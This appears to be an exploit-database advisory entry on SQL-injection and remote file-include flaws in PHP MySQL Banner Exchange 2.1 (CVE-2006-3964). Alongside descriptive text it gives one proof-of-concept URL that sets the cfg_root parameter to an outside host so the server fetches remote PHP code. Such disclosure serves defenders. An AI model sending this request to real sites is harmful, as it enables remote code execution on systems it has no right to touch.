source: http://www.securityfocus.com/bid/19240/info PHP MySQL Banner Exchange is prone to multiple SQL-injection vulnerabilities and a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. An attacker may also leverage the remote file-include issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. Version 2.1 of the application is affected by these vulnerabilities; other versions may also be affected. http://www.example.com/members.php?cfg_root=http://www.example2.com/?
Related ExploitsTrying to match CVEs (1): CVE-2006-3964
Trying to match OSVDBs (1): 29091
Other Possible E-DB Search Terms: Banex PHP MySQL Banner Exchange 2.21, Banex PHP MySQL Banner Exchange
|2006-07-31||28306||Banex PHP MySQL Banner Exchange 2.21 - signup.php site_name Parameter SQL Injection||SirDarckCat|
|2006-07-31||28307||Banex PHP MySQL Banner Exchange 2.21 - admin.php Multiple Parameter SQL Injection||SirDarckCat|